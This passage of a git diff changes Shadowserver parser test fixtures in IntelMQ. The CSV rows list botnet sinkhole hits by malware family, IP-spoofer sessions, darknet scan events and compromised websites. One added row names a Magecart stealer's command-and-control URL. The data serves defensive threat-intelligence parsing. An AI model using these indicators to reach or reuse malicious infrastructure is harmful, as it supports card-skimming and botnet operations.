-"2016-07-24 00:00:50","198.51.100.73",1039,9145,"DE","NIEDERSACHSEN","WILHELMSHAVEN","198-51-100-73.example.net","udp","zeroaccess",,,"198.51.100.63",16471,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:52","198.51.100.253",1899,6805,"DE","HAMBURG","HAMBURG","198-51-100-253.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.29",80,0,"**","198-51-100-29.example.net",1,,,,,,,0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:52","198.51.100.0",53266,3320,"DE","HESSEN","KASSEL","198-51-100-0.example.net","udp","zeroaccess",,,"198.51.100.143",16464,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:53","198.51.100.10",47132,31334,"DE","BERLIN","BERLIN","198-51-100-10.example.net","udp","zeroaccess",,,"198.51.100.206",16464,22773,"US",,,,,,,,,0,0,517510,737415,,"Communications",,,,
-"2016-07-24 00:00:56","198.51.100.76",51789,31334,"DE","RHEINLAND-PFALZ","DIEZ","198-51-100-76.example.net",,"gameover-zeus-proxy","POST /write",,"198.51.100.199",80,0,"**","default",1,,,,,,,0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:00:57","198.51.100.138",53532,9145,"DE","NIEDERSACHSEN","BAD ZWISCHENAHN","198-51-100-138.example.net","udp","zeroaccess",,,"198.51.100.30",16471,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:00:59","198.51.100.158",52668,3320,"DE","NIEDERSACHSEN","HANNOVER","198-51-100-158.example.net",,"nivdort","198-51-100-158.example.net",,"198.51.100.16",80,32748,"US","198-51-100-16.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:00:59","198.51.100.61",,3320,"DE","BAYERN","NUREMBERG","198-51-100-61.example.net",,"bitdefender-ramnit",,,"198.51.100.108",,8075,"US",,,,,,,,,541690,874899,334111,357101,,"Communications",,,,
-"2016-07-24 00:01:00","198.51.100.56",1025,3320,"DE","HESSEN","FRANKFURT AM MAIN","198-51-100-56.example.net","udp","zeroaccess",,,"198.51.100.62",16471,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:01:02","198.51.100.96",49452,3320,"DE","BAYERN","MONCHBERG","198-51-100-96.example.net",,"nivdort","198-51-100-96.example.net",,"198.51.100.53",80,32748,"US","198-51-100-53.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:02","198.51.100.150",1033,31334,"DE","BAYERN","REGENSBURG","198-51-100-150.example.net","udp","zeroaccess",,,"198.51.100.69",16464,22773,"US",,,,,,,,,0,0,517510,737415,,"Communications",,,,
-"2016-07-24 00:01:05","198.51.100.89",1026,3209,"DE","NORDRHEIN-WESTFALEN","MUNSTER","198-51-100-89.example.net","udp","zeroaccess",,,"198.51.100.17",16464,22773,"US",,,,,,,,,0,0,517510,737415,,"Communications",,,,
-"2016-07-24 00:01:05","198.51.100.8",11742,44716,"DE","BERLIN","BERLIN","198-51-100-8.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.94",80,0,"**","198-51-100-94.example.net",1,,,,,,,0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:01:06","198.51.100.244",,3320,"DE","SCHLESWIG-HOLSTEIN","KIEL","198-51-100-244.example.net",,"bitdefender-ramnit",,,"198.51.100.145",,8075,"US",,,,,,,,,541690,874899,334111,357101,,"Communications",,,,
-"2016-07-24 00:01:06","198.51.100.228",52294,6805,"DE","HESSEN","FRANKFURT AM MAIN","198-51-100-228.example.net","udp","zeroaccess",,,"198.51.100.235",16465,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:01:07","198.51.100.209",1025,3320,"DE","NIEDERSACHSEN","SOLTENDIECK","198-51-100-209.example.net","udp","zeroaccess",,,"198.51.100.106",16464,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:01:08","198.51.100.177",53082,8881,"DE","SCHLESWIG-HOLSTEIN","KIEL","198-51-100-177.example.net","udp","zeroaccess",,,"198.51.100.162",16464,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:01:09","198.51.100.208",51764,3320,"DE","HESSEN","FRANKFURT AM MAIN","198-51-100-208.example.net",,"gameover-zeus-proxy","POST /write2",,"198.51.100.8",1931,0,"**",,,,,,,,"53de2d69c262412d7b87f071906ac15fee21fbdf",541690,874899,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:01:11","198.51.100.86",37646,3320,"DE","NORDRHEIN-WESTFALEN","BOCHUM","198-51-100-86.example.net",,"virut","/","Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/4.0; GTB7.4; InfoPath.3; SV1; .NET CLR 3.1.76908; WOW64; en-US)","198.51.100.250",80,32748,"US","198-51-100-250.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:11","198.51.100.139",52115,3320,"DE","HAMBURG","HAMBURG","198-51-100-139.example.net",,"dorkbot",,,"198.51.100.224",4293,8426,"PT",,,,"irc",,,,,541690,874899,0,0,,,,"dorkbot","sinkhole","AnubisNetworks"
-"2016-07-24 00:01:13","198.51.100.144",62821,3320,"DE","NIEDERSACHSEN","EMDEN","198-51-100-144.example.net",,"dorkbot",,,"198.51.100.70",4293,8426,"PT",,,,"irc",,,,,541690,874899,0,0,,,,"dorkbot","sinkhole","AnubisNetworks"
-"2016-07-24 00:01:13","198.51.100.189",51818,3320,"DE","BAYERN","MUNICH","198-51-100-189.example.net","udp","zeroaccess",,,"198.51.100.119",16464,22773,"US",,,,,,,,,541690,874899,517510,737415,,"Communications",,,,
-"2016-07-24 00:01:13","198.51.100.227",,31334,"DE","BREMEN","BREMEN","198-51-100-227.example.net",,"bitdefender-ramnit",,,"198.51.100.194",,8075,"US",,,,,,,,,0,0,334111,357101,,"Communications",,,,
-"2016-07-24 00:01:15","198.51.100.96",4015,3209,"DE","BADEN-WURTTEMBERG","STUTTGART","198-51-100-96.example.net",,"zeus","198-51-100-96.example.net","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.2; .NET4.0C)","198.51.100.43",443,8560,"DE","198-51-100-43.example.net",,,,,,,,0,0,0,0,,,,,,
-"2016-07-24 00:01:16","198.51.100.206",49853,29562,"DE","BADEN-WURTTEMBERG","KARLSRUHE","198-51-100-206.example.net",,"pandabanker","/example-index.php","Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)","198.51.100.92",443,8560,"DE","198-51-100-92.example.net",,,,,,,,0,0,0,0,,,,,,
-"2016-07-24 00:01:18","198.51.100.214",46212,3209,"DE","SACHSEN-ANHALT","KADE","198-51-100-214.example.net",,"torpig",,,"198.51.100.247",80,20473,"US","198-51-100-247.example.net",,,,,,,,0,0,518210,737415,,"Information Technology",,,,
-"2016-07-24 00:01:18","198.51.100.196",41959,28753,"DE","HESSEN","FRANKFURT AM MAIN","198-51-100-196.example.net",,"cycbot","/example-index.php","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)","198.51.100.213",80,32748,"US","198-51-100-213.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:19","198.51.100.125",51149,31334,"DE","BAYERN","HIRSCHAU","198-51-100-125.example.net",,"nivdort","198-51-100-125.example.net",,"198.51.100.7",80,32748,"US","198-51-100-7.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:19","198.51.100.161",61364,3320,"DE","BAYERN","NUREMBERG","198-51-100-161.example.net",,"nivdort","198-51-100-161.example.net",,"198.51.100.145",80,32748,"US","198-51-100-145.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:21","198.51.100.191",20252,6830,"DE","NORDRHEIN-WESTFALEN","WUPPERTAL","198-51-100-191.example.net",,"gozi",,,"198.51.100.77",80,1101,"NL","198-51-100-77.example.net",,,,,,,,0,0,0,0,,"Information Technology",,,,
-"2016-07-24 00:01:22","198.51.100.206",,3320,"DE","NORDRHEIN-WESTFALEN","ERKELENZ","198-51-100-206.example.net",,"bitdefender-ramnit",,,"198.51.100.77",,8075,"US",,,,,,,,,541690,874899,334111,357101,,"Communications",,,,
-"2016-07-24 00:01:23","198.51.100.245",47485,24940,"DE","BAYERN","GUNZENHAUSEN","198-51-100-64.example.net",,"torpig","/","Mozilla/5.0 (compatible; Digincore bot; https://www.digincore.com/crawler.html for rules and instructions.","198.51.100.127",80,32748,"US","198-51-100-127.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:27","198.51.100.127",1224,31334,"DE","BAYERN","COBURG","198-51-100-127.example.net",,"dircrypt","/","Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE)","198.51.100.156",80,32748,"US","198-51-100-156.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:27","198.51.100.156",,3320,"DE","NORDRHEIN-WESTFALEN","WERMELSKIRCHEN","198-51-100-156.example.net",,"bitdefender-foreign","/example-index.php",,"198.51.100.46",80,8708,"RO","198-51-100-46.example.net",,,"http",,,,,541690,874899,0,0,,,,,,
-"2016-07-24 00:01:28","198.51.100.57",63045,6805,"DE","BERLIN","BERLIN","198-51-100-57.example.net",,"matsnu","/example-index.php","Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)","198.51.100.9",80,32748,"US","198-51-100-9.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:31","198.51.100.86",54694,3320,"DE","BAYERN","MARKT ERLBACH","198-51-100-86.example.net",,"nivdort","198-51-100-86.example.net",,"198.51.100.31",80,32748,"US","198-51-100-31.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:32","198.51.100.169",24095,3209,"DE","RHEINLAND-PFALZ","SEMBACH",,"udp","zeroaccess",,,"198.51.100.200",16465,22773,"US",,,,,,,,,0,0,517510,737415,,"Communications",,,,
-"2016-07-24 00:01:33","198.51.100.104",55688,3320,"DE","BERLIN","BERLIN","198-51-100-104.example.net",,"nivdort","198-51-100-104.example.net",,"198.51.100.121",80,32748,"US","198-51-100-121.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:34","198.51.100.183",62064,3320,"DE","MECKLENBURG-VORPOMMERN","NEUSTRELITZ","198-51-100-183.example.net",,"nivdort","198-51-100-183.example.net",,"198.51.100.37",80,32748,"US","198-51-100-37.example.net",,,,,,,,541690,874899,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:36","198.51.100.94",31846,3320,"DE","SACHSEN-ANHALT","EISLEBEN",,,"nivdort","198-51-100-94.example.net",,"198.51.100.156",80,32748,"US","198-51-100-156.example.net",,,,,,,,518210,737415,0,0,,"Communications",,,,"SecurityScorecard"
-"2016-07-24 00:01:37","198.51.100.253",2912,3320,"DE","RHEINLAND-PFALZ","RENNEROD","198-51-100-253.example.net",,"gameover-zeus-proxy","POST /write",,"198.51.100.52",80,0,"**","default",1,,,,,,,541690,874899,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:01:38","198.51.100.203",12831,3320,"DE","NORDRHEIN-WESTFALEN","BONN","198-51-100-203.example.net",,"zeus",,,"198.51.100.18",80,8560,"DE","198-51-100-18.example.net",,,,,,,,0,0,0,0,,,,,,
-"2016-07-24 00:01:40","198.51.100.108",63678,31334,"DE","BAYERN","NUREMBERG","198-51-100-108.example.net","udp","zeroaccess",,,"198.51.100.125",16470,22773,"US",,,,,,,,,0,0,517510,737415,,"Commercial Facilities",,,,
-"2016-07-24 00:01:42","198.51.100.134",50507,9145,"DE","NIEDERSACHSEN","LEER","198-51-100-134.example.net",,"gameover-zeus-dga","GET /",,"198.51.100.228",80,0,"**","198-51-100-228.example.net",1,,,,,,,0,0,0,0,,"Healthcare And Public Health",,,,
-"2016-07-24 00:01:43","198.51.100.218",49362,31334,"DE","SCHLESWIG-HOLSTEIN","ECKERNFORDE","198-51-100-218.example.net",,"nivdort","198-51-100-218.example.net",,"198.51.100.109",80,32748,"US","198-51-100-109.example.net",,,,,,,,0,0,0,0,,"Communications",,,,"SecurityScorecard"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/caida_ip_spoofer.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/caida_ip_spoofer.csv
deleted file mode 100644
index bb67f815a..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/caida_ip_spoofer.csv
+++ /dev/null
@@ -1,6 +0,0 @@
-"timestamp","ip","asn","geo","region","city","hostname","type","infection","naics","sic","sector","family","tag","public_source","network","version","type","routedspoof","session","nat"
-"2019-08-27 00:06:24","137.97.71.0",55836,"IN","KERALA","THRISSUR",,"Session","ip-spoofer",517312,0,"Information Technology",,,"caida","137.97.71.0/24","ipv4","Session","received",739969,"True"
-"2019-08-27 01:19:47","103.95.33.0",136749,"MY","SELANGOR","SHAH ALAM",,"Session","ip-spoofer",541990,0,"Communications",,,"caida","103.95.33.0/24","ipv4","Session","received",739992,"True"
-"2019-08-27 02:32:12","115.78.9.0",7552,"VN","HO CHI MINH","THANH PHO HO CHI MINH",,"Session","ip-spoofer",517312,0,"Communications",,,"caida","115.78.9.0/24","ipv4","Session","rewritten",740024,"True"
-"2019-08-27 03:16:08","24.237.163.0",8047,"US","ALASKA","BETHEL","0-163-237-24.gci.net","Session","ip-spoofer",517919,737415,,,,"caida","24.237.163.0/24","ipv4","Session","received",740037,"False"
-"2019-08-27 04:29:49","122.255.35.0",18001,,,,,"Session","ip-spoofer",,,,,,"caida","122.255.35.0/24","ipv4","Session","received",740057,"False"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/compromised_website.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/compromised_website.csv
index b91b32e65..117dd6560 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/compromised_website.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/compromised_website.csv
@@ -1,3 +1,4 @@
-"timestamp","ip","port","hostname","tag","application","asn","geo","region","city","url","http_host","category","system","detected_since","server","redirect_target","naics","sic","sector"
-"2017-01-16 00:43:48","203.0.113.1",80,"example.com","hacked-webserver-stealrat-t1","http",64496,"AT","WIEN","VIENNA","/header.php","example.com","spam","WINNT","2015-05-09 05:51:12","Microsoft-IIS/7.5",,0,0,
-"2018-04-09 15:43:41","203.0.113.1","80","","phishing","http","64496","AT","STEIERMARK","GRAZ","/","example.com","phishing","","","","","0","0",""
+"timestamp","ip","port","hostname","tag","application","asn","geo","region","city","url","http_host","category","system","detected_since","server","redirect_target","naics","sic","sector","cc_url","family"
+"2017-01-16 00:43:48","203.0.113.1",80,"example.com","hacked-webserver-stealrat-t1","http",64496,"AT","WIEN","VIENNA","/header.php","example.com","spam","WINNT","2015-05-09 05:51:12","Microsoft-IIS/7.5",,0,0,,,
+"2018-04-09 15:43:41","203.0.113.1","80","","phishing","http","64496","AT","STEIERMARK","GRAZ","/","example.com","phishing","","","","","0","0","",,
+"2022-02-07 21:52:29","66.249.0.0",,"66-249-0-0.example.com","magecart",,1234,"US","CALIFORNIA","MOUNTAIN VIEW",,,"stealer",,,,,519130,,"Communications, Service Provider, and Hosting Service","https://lolfree.pw/ads.txt",
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/darknet.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/darknet.csv
deleted file mode 100644
index 9950eb05d..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/darknet.csv
+++ /dev/null
@@ -1,134 +0,0 @@
-"timestamp","ip","port","asn","geo","region","city","hostname","type","dst_ip","dst_port","dst_asn","dst_geo","count","naics","sic","dst_naics","dst_sic","sector","dst_sector","family","tag","public_source"
-"2018-11-19 00:00:17","198.51.100.47",,64496,"AT","WIEN","VIENNA","198-51-100-47.example.net",,,8001,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:00:25","198.51.100.4",,64497,"AT","STEIERMARK","DEUTSCHLANDSBERG","198-51-100-4.example.net",,,80,,,2,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:58:23","198.51.100.146",,64498,"AT","WIEN","VIENNA",,,,5555,,,2,518210,737401,,,"Information Technology",,,"mirai-like","sissden"
-"2018-11-19 00:00:32","198.51.100.30",,64496,"AT","TIROL","PETTNEU AM ARLBERG","198-51-100-30.example.net",,,8080,,,2,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:01:44","198.51.100.147",,64496,"AT","VORARLBERG","BLUDENZ",,,,23,,,2,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:01:55","198.51.100.214",,64496,"AT","SALZBURG","TAMSWEG","198-51-100-214.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:01:55","198.51.100.53",,64496,"AT","OBEROSTERREICH","GREIN",,,,23,,,9,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:02:38","198.51.100.56",,64496,"AT","WIEN","VIENNA","198-51-100-56.example.net",,,9000,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:03:32","198.51.100.140",,64496,"AT","VORARLBERG","HARD",,,,63390,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:05:46","198.51.100.191",,64496,"AT","TIROL","PETTNEU AM ARLBERG","198-51-100-191.example.net",,,81,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:07:44","198.51.100.129",,64496,"AT","OBEROSTERREICH","LINZ","198-51-100-129.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:11:24","198.51.100.37",,64496,"AT","WIEN","VIENNA","198-51-100-37.example.net",,,5555,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:14:24","198.51.100.199",,64496,"AT","WIEN","VIENNA","198-51-100-199.example.net",,,8080,,,2,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:14:54","198.51.100.50",,64496,"AT","OBEROSTERREICH","UNTERACH","198-51-100-50.example.net",,,81,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:16:08","198.51.100.114",,64496,"AT","WIEN","VIENNA","198-51-100-120.example.net",,,2323,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:16:34","198.51.100.87",,64496,"AT","WIEN","VIENNA","198-51-100-87.example.net",,,8001,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:17:08","198.51.100.107",,64496,"AT","WIEN","VIENNA",,,,8001,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:19:18","198.51.100.92",,64496,"AT","OBEROSTERREICH","LINZ","198-51-100-92.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:19:32","198.51.100.220",,64496,"AT","WIEN","VIENNA","198-51-100-220.example.net",,,8001,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:25:37","198.51.100.238",,64496,"AT","WIEN","VIENNA","198-51-100-238.example.net",,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:25:43","198.51.100.116",,64496,"AT","WIEN","VIENNA","198-51-100-116.example.net",,,8088,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:32:17","198.51.100.103",,64496,"AT","WIEN","VIENNA","198-51-100-103.example.net",,,82,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:33:04","198.51.100.149",,64496,"AT","TIROL","INNSBRUCK","198-51-100-149.example.net",,,5555,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:39:09","198.51.100.54",,64496,"AT","WIEN","VIENNA","198-51-100-54.example.net",,,85,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:39:51","198.51.100.83",,64496,"AT","KARNTEN","KLAGENFURT AM WORTHERSEE","198-51-100-83.example.net",,,85,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:53:46","198.51.100.148",,64496,"AT","NIEDEROSTERREICH","SCHWECHAT","198-51-100-148.example.net",,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 01:00:44","198.51.100.170",,64496,"AT","VORARLBERG","BREGENZ",,,,9000,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 01:01:41","198.51.100.165",,64496,"AT","WIEN","VIENNA","198-51-100-163.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 01:20:04","198.51.100.122",,64496,"AT","NIEDEROSTERREICH","BRUNN AM GEBIRGE",,,,32764,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 01:29:10","198.51.100.224",,64496,"AT","WIEN","VIENNA","198-51-100-224.example.net",,,8080,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 02:14:38","198.51.100.155",,64496,"AT","KARNTEN","KLAGENFURT AM WORTHERSEE","198-51-100-155.example.net",,,23,,,2,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 02:28:09","198.51.100.194",,64496,"AT","SALZBURG","SALZBURG","198-51-100-194.example.net",,,8080,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 02:35:46","198.51.100.30",,64496,"AT","OBEROSTERREICH","ATTERSEE",,,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 02:52:06","198.51.100.83",,64496,"AT","WIEN","VIENNA","198-51-100-83.example.net",,,8080,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 02:56:35","198.51.100.170",,64496,"AT","WIEN","VIENNA","198-51-100-170.example.net",,,2323,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 03:09:48","198.51.100.142",,64496,"AT","TIROL","LIENZ",,,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 03:28:10","198.51.100.239",,64496,"AT","WIEN","VIENNA","198-51-100-201.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 03:36:49","198.51.100.238",,64496,"AT","TIROL","INNSBRUCK",,,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 03:40:26","198.51.100.137",,64496,"AT","STEIERMARK","GRAZ","198-51-100-137.example.net",,,5555,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 03:52:58","198.51.100.246",,64496,"AT","WIEN","VIENNA","198-51-100-246.example.net",,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 04:02:35","198.51.100.196",,64496,"AT","WIEN","VIENNA","198-51-100-196.example.net",,,80,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 04:07:21","198.51.100.53",,64496,"AT","STEIERMARK","WEIZ","198-51-100-53.example.net",,,8443,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 04:16:16","198.51.100.30",,64496,"AT","TIROL","LADIS",,,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 04:46:25","198.51.100.123",,64496,"AT","OBEROSTERREICH","VOCKLABRUCK","198-51-100-123.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 05:06:03","198.51.100.212",,64496,"AT","STEIERMARK","GLEISDORF",,,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 06:51:18","198.51.100.190",,64496,"AT","STEIERMARK","WEIZ",,,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 07:24:54","198.51.100.192",,64496,"AT","SALZBURG","BAD GASTEIN","198-51-100-192.example.net",,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 08:49:45","198.51.100.28",,64496,"AT","OBEROSTERREICH","RUTZENMOOS",,,,8001,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 09:36:18","198.51.100.87",,64496,"AT","TIROL","ZAMS",,,,8443,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:03:42","198.51.100.174",,64496,"AT","KARNTEN","KLAGENFURT AM WORTHERSEE","198-51-100-174.example.net",,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 10:05:04","198.51.100.186",,64496,"AT","OBEROSTERREICH","WELS","198-51-100-186.example.net",,,85,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:17:33","198.51.100.223",,64496,"AT","SALZBURG","SAALFELDEN AM STEINERNEN MEER","198-51-100-223.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:18:20","198.51.100.223",,64496,"AT","SALZBURG","SAALFELDEN AM STEINERNEN MEER","198-51-100-223.example.net",,,23,,,2,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:50:37","198.51.100.164",,64496,"AT","OBEROSTERREICH","UNTERACH","198-51-100-164.example.net",,,81,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:54:51","198.51.100.204",,64496,"AT","VORARLBERG","HOHENEMS",,,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 11:26:57","198.51.100.120",,64496,"AT","WIEN","VIENNA","198-51-100-120.example.net",,,23,,,3,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 12:46:00","198.51.100.157",,64496,"AT","BURGENLAND","EISENSTADT","198-51-100-157.example.net",,,84,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 14:17:26","198.51.100.107",,64496,"AT","WIEN","VIENNA","198-51-100-107.example.net",,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 15:09:26","198.51.100.135",,64496,"AT","OBEROSTERREICH","THALHEIM BEI WELS","198-51-100-135.example.net",,,8000,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 15:54:29","198.51.100.185",,64496,"AT","NIEDEROSTERREICH","NEULENGBACH","198-51-100-185.example.net",,,8080,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 16:45:10","198.51.100.222",,64496,"AT","STEIERMARK","GRAZ","198-51-100-222.example.net",,,2480,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 17:19:06","198.51.100.195",,64496,"AT","WIEN","VIENNA","198-51-100-195.example.net",,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 17:45:05","198.51.100.56",,64496,"AT","NIEDEROSTERREICH","PERCHTOLDSDORF","198-51-100-56.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:42:08","198.51.100.140",,64496,"AT","OBEROSTERREICH","RUTZENMOOS",,,,8081,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:47:03","198.51.100.63",,64496,"AT","TIROL","DOLSACH","198-51-100-218.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:48:28","198.51.100.54",,64496,"AT","TIROL","ST. VEIT IN DEFEREGGEN","198-51-100-67.example.net",,,85,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:58:23","198.51.100.146",,64496,"AT","WIEN","VIENNA",,,,5555,,,2,518210,737401,,,"Information Technology",,,"mirai-like","sissden"
-"2018-11-19 00:00:17","198.51.100.47",,64496,"AT","WIEN","VIENNA","198-51-100-47.example.net",,,8001,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:00:25","198.51.100.4",,64496,"AT","STEIERMARK","DEUTSCHLANDSBERG","198-51-100-4.example.net",,,80,,,2,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:00:32","198.51.100.30",,64496,"AT","TIROL","PETTNEU AM ARLBERG","198-51-100-30.example.net",,,8080,,,2,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:01:44","198.51.100.147",,64496,"AT","VORARLBERG","BLUDENZ",,,,23,,,2,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:01:55","198.51.100.214",,64496,"AT","SALZBURG","TAMSWEG","198-51-100-214.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:01:55","198.51.100.53",,64496,"AT","OBEROSTERREICH","GREIN",,,,23,,,9,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:02:38","198.51.100.56",,64496,"AT","WIEN","VIENNA","198-51-100-56.example.net",,,9000,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:03:32","198.51.100.140",,64496,"AT","VORARLBERG","HARD",,,,63390,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:05:46","198.51.100.191",,64496,"AT","TIROL","PETTNEU AM ARLBERG","198-51-100-191.example.net",,,81,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:07:44","198.51.100.129",,64496,"AT","OBEROSTERREICH","LINZ","198-51-100-129.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
